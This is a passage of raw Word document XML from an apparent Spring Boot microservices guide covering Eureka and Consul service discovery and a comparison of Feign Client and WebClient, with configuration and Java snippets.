    </w:p>
    <w:p w14:paraId="3AD813A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0E7754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Server</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3E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pplication, enable the Eureka Server with the @EnableEurekaServer annotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B79CE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2AEFAE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Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48001B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EurekaServerApplication {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472D787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673465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EurekaServerApplication.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5D90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437D811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0CE8D00"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 to configure the Eureka server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F04089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Eureka Server configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C9C57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er.port=8761</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAA6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registerWithEureka=false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6757A60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fetchRegistry=false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2888EFA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Client</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285F7BD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xml:space="preserve"> that will register with Eureka, enable the Eureka client using the @EnableEurekaClient annotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721FBA1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4632879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Client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B880B6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4D2AA2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77A4E21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0B819D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067718D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1FFEB7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F9BA8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1476B08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serviceUrl.defaultZone=http://localhost:8761/eureka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285E135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covery and Communication</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C17C4B8"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make a service communicate with other services, use @LoadBalanced RestTemplate or Spring Cloud's Feign client for automatic service discovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E2ACD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710CD6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1485EB91" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965" w:rsidP="008B3EF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70AAD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652B103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oadBalanced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4019FBE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RestTemplate restTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE1924D" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965" w:rsidP="008B3EF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BB6757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31C4C90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6561860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restTemplate.getForObject("http://other-microservice/endpoint", String.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695FD55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1C88752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A03070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21315151"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Start the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nd then start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The microservices will automatically register with Eureka, and you can access the Eureka dashboard at http://localhost:8761 to see all registered services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C09459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Consul</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC0E39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l is a tool for service discovery, health checking, and key-value storage. It is more versatile than Eureka and can work in both cloud and on-premises environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E8EBC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16AB1BA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Services register with Consul, and other services can discover them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5072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s</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Consul performs health checks on services to ensure that only healthy services are used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524BC8E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KV Storage</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Consul provides a key-value store that can be used for configuration management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406774B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ulti-Region</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Consul supports multi-region service discovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF5D47E"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Consul in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E5C63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09F1B05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integrate Consul into your Spring Boot application, add the Spring Cloud Consul starter dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18064E8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44FF3F0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F212D7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consul-discovery&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DB236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1FE8E33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Consul Server</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4462219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irst, ensure that you have a running Consul server (you can run Consul locally or in the cloud).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B0029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configuration in your application.properties or application.yml file to set up Consul:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1261099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l configuration for the microservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB8D2E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60807A0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host=localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD563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port=8500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044909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nable Consul Discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F7F6FF"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enable Consul by adding the @EnableDiscoveryClient annotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CB447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680D7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DiscoveryClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D65B7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257FBE7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0B9E99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6742247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F7D92F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F7BEE3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 and Discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106F723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run the microservice, it will automatically register with Consul. You can query Consul to discover the services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7CF8C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RestTemplate or FeignClient to call other services using Consul's service discovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B60B3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07D2FA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43E9D1D8" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965" w:rsidP="008B3EF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C24133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0F035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DiscoveryClient discoveryClient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E687B54" w14:textId="77777777" w:rsidR="00115965" w:rsidRPr="008B3EF9" w:rsidRDefault="00115965" w:rsidP="008B3EF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59500D2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6F15372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1BF1D6E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ist&lt;ServiceInstance&gt; instances = discoveryClient.getInstances("other-microservice");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CDCF4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 uri = instances.get(0).getUri();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D94D61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new RestTemplate().getForObject(uri, String.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E521C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7E4D430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5105F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1024A9A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health checks to ensure that only healthy services are registered with Consul. This can be configured as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698DF4D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enabled=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F6AF4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interval=30s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AF021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http-path=/actuator/health</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF0419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5B11F74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un the </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consul server</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and your microservices. You can access the Consul dashboard at http://localhost:8500 to verify the services and their health.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B48576D"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014EDB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A REST-based service registry by Netflix for service discovery and health checking. It is often used in Spring Cloud applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49429F2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A tool for service discovery, health checking, and key-value storage. It is more feature-rich than Eureka and can be used for both service discovery and configuration management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDFAA1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978" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC8A9D6" w14:textId="7E2D4628" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="009C51A5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="715" w:name="_Toc197867929"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Feign Client vs WebClient: Which one to use and why</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="715"/>
    </w:p>
    <w:p w14:paraId="36CB5995" w14:textId="4D781167" w:rsidR="00FF6B93" w:rsidRPr="008B3EF9" w:rsidRDefault="00FF6B93"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hen it comes to making HTTP requests in a Spring Boot application, two popular options are </w:t>
      </w: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Feign Client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE84B8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13A726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a declarative web service client that makes HTTP requests easier by abstracting away much of the boilerplate code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8E4A7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integrates tightly with </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and allows you to define an interface that represents the HTTP API you want to consume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CB795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 automatically generates the implementation of the interface and performs HTTP requests based on annotations like @RequestMapping, @GetMapping, @PostMapping, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF9FA3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24009EA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larative Syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You define your API with annotations, and Feign automatically implements the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D3D0A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r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Feign is built with Spring Cloud, so it's ideal for microservices architectures where you need to call other microservices (e.g., for service discovery, load balancing, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F94C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city</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It abstracts the complexities of making HTTP calls, making it easier to consume APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F5A15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E3AE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Feign is often used in Spring Cloud microservices to communicate with other services through HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FE81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API Calling</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ideal when you need to call simple REST APIs and want to avoid writing boilerplate code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B1A2D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uilt-in Load Balancing</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When used in conjunction with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 xml:space="preserve"> for service discovery, Feign automatically handles load balancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC0A7E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1BF66A0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Client(name = "user-service", url = "http://localhost:8080")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574DE32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interface UserServiceClient {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62106F37" w14:textId="77777777" w:rsidR="00FF6B93" w:rsidRPr="008B3EF9" w:rsidRDefault="00FF6B93" w:rsidP="008B3EF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B876A3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GetMapping("/users/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0502CD0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ser getUser(@PathVariable("id") Long id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577F26A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3F9E01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e above example, the Feign client UserServiceClient is defined to call the GET /users/{id} API endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6416473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45B5FA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sy to use and configure with minimal boilerplate code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714B158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utomatically handles retries, circuit breakers (when combined with </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hystrix</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), and load balancing (when combined with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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6885573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deal for simple, synchronous REST API calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E70F41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2E51C96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s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by default, so it may not be the best choice if you need non-blocking or asynchronous operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A8A8E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oesn't provide much control over the HTTP request (like custom headers, timeouts, etc.) beyond what Feign supports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B652F2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45ECA9">
          <v:rect id="_x0000_i2979" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CF386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WebClient:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB3684F"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00B594F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the modern, non-blocking, and reactive alternative to </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RestTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring. It’s part of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 and it's designed for making HTTP calls in a non-blocking and asynchronous way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511F86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supports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operations, making it more versatile compared to Feign.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4182D7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ebClient also provides extensive customization options for HTTP requests, like adding custom headers, handling cookies, and managing timeouts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539D2E9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5011E2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 and Asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Supports non-blocking, reactive programming through the </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mono</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Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> classes from Project Reactor, making it ideal for scalable applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59283B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Supports Both Sync and Async</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: While WebClient supports asynchronous operations, it also allows synchronous operations if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7782574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le and Customizable</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You have more control over the HTTP request and response. You can customize headers, query parameters, cookies, timeouts, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5B60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 Provides more robust error handling mechanisms with status code and response body processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7280354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B88AFD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Non-blocking Communication</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: WebClient is ideal when you're building reactive applications that require high scalability or when you're working with WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CFD8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 If you need non-blocking, asynchronous communication, WebClient is the right choice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A4175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Requests/Customizations</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you need more control over the request/response lifecycle, WebClient is better than Feign.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F20A09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01BE03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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719F9B2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UserService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130FED75" w14:textId="77777777" w:rsidR="00FF6B93" w:rsidRPr="008B3EF9" w:rsidRDefault="00FF6B93" w:rsidP="008B3EF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="651554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final WebClient webClient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4D3425" w14:textId="77777777" w:rsidR="00FF6B93" w:rsidRPr="008B3EF9" w:rsidRDefault="00FF6B93" w:rsidP="008B3EF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72D67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UserService(WebClient.Builder webClientBuilder) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E1DA8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this.webClient = webClientBuilder.baseUrl("http://localhost:8080").build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8A22E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3468A213" w14:textId="77777777" w:rsidR="00FF6B93" w:rsidRPr="008B3EF9" w:rsidRDefault="00FF6B93" w:rsidP="008B3EF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D1E7D4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Mono&lt;User&gt; getUser(Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BA01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this.webClient.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD21E9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users/{id}", id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EBE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rieve()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323859C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odyToMono(User.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D9F22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22C86F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614334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example, we are using WebClient to asynchronously retrieve a User from a REST endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4EAD9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6765538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n-block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reactive</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ideal for applications that need to handle large numbers of concurrent requests efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3541BF8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vides full control over HTTP requests, including headers, parameters, and body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365C757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an be used in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ways, making it versatile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1412C8D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orks seamlessly with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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAEE66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63CA97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lightly more complex than Feign for simple API calls, especially when you don't need its full functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2984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quires more boilerplate code if you don’t need non-blocking features (for simple use cases).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CE80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4FAB0">
          <v:rect id="_x0000_i2980" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="123488A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799"/>
        <w:gridCol w:w="4138"/>
      </w:tblGrid>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="01CBADB9" w14:textId="77777777" w:rsidTr="00FF6B93">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
